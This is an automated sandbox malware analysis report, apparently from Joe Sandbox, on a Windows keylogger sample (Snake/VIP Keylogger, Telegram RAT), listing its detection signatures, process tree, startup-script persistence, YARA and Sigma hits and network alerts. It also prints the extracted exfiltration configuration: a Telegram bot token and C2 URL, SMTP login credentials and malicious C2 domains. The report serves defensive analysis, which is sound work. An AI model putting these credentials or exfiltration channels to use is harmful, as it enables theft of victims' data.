Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DSD876543456780000.exe

Overview

General Information

Sample name:DSD876543456780000.exe
Analysis ID:1481105
MD5:f202040eb9d89916f413e67d59c7fd7f
SHA1:84ce5b7ca29eb6e4a5290d21c4948d505c23a04a
SHA256:59337107a058bfd8eb4b8bc0506208d1eab639b6fbd92aefb156e7b21a1d3695
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • DSD876543456780000.exe (PID: 3332 cmdline: "C:\Users\user\Desktop\DSD876543456780000.exe" MD5: F202040EB9D89916F413E67D59C7FD7F)
    • chordates.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\DSD876543456780000.exe" MD5: F202040EB9D89916F413E67D59C7FD7F)
      • svchost.exe (PID: 5260 cmdline: "C:\Users\user\Desktop\DSD876543456780000.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • wscript.exe (PID: 7096 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • chordates.exe (PID: 7044 cmdline: "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" MD5: F202040EB9D89916F413E67D59C7FD7F)
      • svchost.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI", "Chat id": "6443825857"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x1300:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1fdd0:$s5: delete[]
  • 0x1f288:$s6: constructor or from DllMain.
00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmpMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
  • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
  • 0x700:$s3: 83 EC 38 53 B0 62 88 44 24 2B 88 44 24 2F B0 08 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
  • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
  • 0x1e9d0:$s5: delete[]
  • 0x1de88:$s6: constructor or from DllMain.
00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
      00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        Click to see the 63 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        3.3.svchost.exe.305af20.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          3.3.svchost.exe.305af20.1.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            3.3.svchost.exe.305af20.1.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
              3.3.svchost.exe.305af20.1.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
              • 0x336af:$a1: get_encryptedPassword
              • 0x33683:$a2: get_encryptedUsername
              • 0x33747:$a3: get_timePasswordChanged
              • 0x3365f:$a4: get_passwordField
              • 0x336c5:$a5: set_encryptedPassword
              • 0x33492:$a7: get_logins
              • 0x2ed56:$a10: KeyLoggerEventArgs
              • 0x2ed25:$a11: KeyLoggerEventArgsEventHandler
              • 0x33566:$a13: _encryptedPassword
              3.3.svchost.exe.305af20.1.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
              • 0x3d481:$a2: \Comodo\Dragon\User Data\Default\Login Data
              • 0x3cb24:$a3: \Google\Chrome\User Data\Default\Login Data
              • 0x3cd81:$a4: \Orbitum\User Data\Default\Login Data
              • 0x3d760:$a5: \Kometa\User Data\Default\Login Data
              Click to see the 157 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , ProcessId: 7096, ProcessName: wscript.exe
              Sigma detected: Suspicious Outbound SMTP Connections
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 118.69.190.131, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\svchost.exe, Initiated: true, ProcessId: 5260, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49734
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DSD876543456780000.exe", CommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", ParentImage: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe, ParentProcessId: 6564, ParentProcessName: chordates.exe, ProcessCommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", ProcessId: 5260, ProcessName: svchost.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs" , ProcessId: 7096, ProcessName: wscript.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DSD876543456780000.exe", CommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", ParentImage: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe, ParentProcessId: 6564, ParentProcessName: chordates.exe, ProcessCommandLine: "C:\Users\user\Desktop\DSD876543456780000.exe", ProcessId: 5260, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe, ProcessId: 6564, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs

              Snort Signatures

              No Snort rule has matched

              Suricata Signatures

              Timestamp:2024-07-25T03:35:25.760755+0200
              SID:2803305
              Source Port:49737
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T03:34:53.126997+0200
              SID:2803305
              Source Port:49730
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T03:34:35.748211+0200
              SID:2803274
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T03:34:48.130043+0200
              SID:2033967
              Source Port:49721
              Destination Port:443
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:2024-07-25T03:34:50.357572+0200
              SID:2803274
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T03:35:33.045497+0200
              SID:2045615
              Source Port:49749
              Destination Port:443
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:2024-07-25T03:34:48.376956+0200
              SID:2045615
              Source Port:49721
              Destination Port:443
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:2024-07-25T03:35:03.937735+0200
              SID:2033967
              Source Port:49735
              Destination Port:443
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:2024-07-25T03:34:48.133134+0200
              SID:2029322
              Source Port:443
              Destination Port:49721
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:2024-07-25T03:35:32.797219+0200
              SID:2033967
              Source Port:49749
              Destination Port:443
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:2024-07-25T03:34:38.114931+0200
              SID:2803305
              Source Port:49706
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T03:34:47.487230+0200
              SID:2033966
              Source Port:56252
              Destination Port:53
              Protocol:UDP
              Classtype:Misc activity
              Timestamp:2024-07-25T03:35:29.798578+0200
              SID:2022930
              Source Port:443
              Destination Port:49743
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-25T03:34:46.149772+0200
              SID:2803305
              Source Port:49718
              Destination Port:443
              Protocol:TCP
              Classtype:Unknown Traffic
              Timestamp:2024-07-25T03:34:38.826388+0200
              SID:2803274
              Source Port:49707
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T03:35:50.131796+0200
              SID:2033967
              Source Port:49751
              Destination Port:443
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:2024-07-25T03:34:41.435747+0200
              SID:2803274
              Source Port:49711
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T03:34:42.701479+0200
              SID:2803274
              Source Port:49713
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T03:34:37.513826+0200
              SID:2803274
              Source Port:49704
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T03:35:32.797234+0200
              SID:2029322
              Source Port:443
              Destination Port:49749
              Protocol:TCP
              Classtype:Misc activity
              Timestamp:2024-07-25T03:34:40.138843+0200
              SID:2803274
              Source Port:49709
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T03:34:52.576337+0200
              SID:2803274
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T03:34:53.757840+0200
              SID:2803274
              Source Port:49732
              Destination Port:80
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-07-25T03:34:51.655172+0200
              SID:2022930
              Source Port:443
              Destination Port:49723
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: http://aborters.duckdns.org:8081Avira URL Cloud: Label: malware
              Source: http://anotherarmy.dns.army:8081Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sales-nguyen@vvtrade.vn", "Password": "qVyP6qyv6MQCmZJBRs4t", "Host": "mail.vvtrade.vn", "Port": "587"}
              Source: 3.2.svchost.exe.7730000.2.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI", "Chat id": "6443825857"}
              Source: svchost.exe.6024.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendMessage"}
              Multi AV Scanner detection for domain / URL
              Source: http://varders.kozow.com:8081Virustotal: Detection: 14%Perma Link
              Source: http://aborters.duckdns.org:8081Virustotal: Detection: 11%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeReversingLabs: Detection: 37%
              Multi AV Scanner detection for submitted file
              Source: DSD876543456780000.exeReversingLabs: Detection: 37%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: DSD876543456780000.exeJoe Sandbox ML: detected

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: reallyfreegeoip.org
              Source: DSD876543456780000.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49749 version: TLS 1.2
              Source: Binary string: _.pdb source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: chordates.exe, 00000002.00000003.2038779865.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000002.00000003.2038113253.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2178237621.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, chordates.exe, 00000005.00000003.2176735582.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C5DBBE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C2C2A2 FindFirstFileExW,0_2_00C2C2A2
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C668EE FindFirstFileW,FindClose,0_2_00C668EE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00C6698F
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C5D076
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C5D3A9
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C69642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C69642
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C6979D
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C69B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00C69B2B
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C65C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00C65C97
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_00ECDBBE
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E9C2A2 FindFirstFileExW,2_2_00E9C2A2
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED68EE FindFirstFileW,FindClose,2_2_00ED68EE
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_00ED698F
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00ECD076
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ECD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00ECD3A9
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00ED9642
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00ED979D
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00ED9B2B
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00ED5C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00ED5C97
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080ACF7Ch3_2_080ACCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_080A0040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080AFAECh3_2_080AF840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_080A0856
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080AD3D4h3_2_080AD128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080A3206h3_2_080A3134
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080A2834h3_2_080A2580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080AD82Ch3_2_080AD580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080A3206h3_2_080A2DDA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080ADC84h3_2_080AD9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080A3206h3_2_080A2DE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080AE0DCh3_2_080ADE30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_080A0676
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080AE534h3_2_080AE288
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080AE98Ch3_2_080AE6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080AEDE4h3_2_080AEB38
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080A0D10h3_2_080A0B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080A169Ah3_2_080A0B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080AF23Ch3_2_080AEF90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 080AF694h3_2_080AF3E8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092A2834h6_2_092A2580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092A3206h6_2_092A2DE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092ADC84h6_2_092AD9D8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092A0D10h6_2_092A0B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092A169Ah6_2_092A0B30
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092AD3D4h6_2_092AD128
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092A3206h6_2_092A3134
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092AD82Ch6_2_092AD580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092A3206h6_2_092A2DE2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092A3206h6_2_092A31C9
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_092A0040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092AFAECh6_2_092AF840
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_092A0856
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092ACF7Ch6_2_092ACCD0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then jmp 092AEDE4h6_2_092AEB38
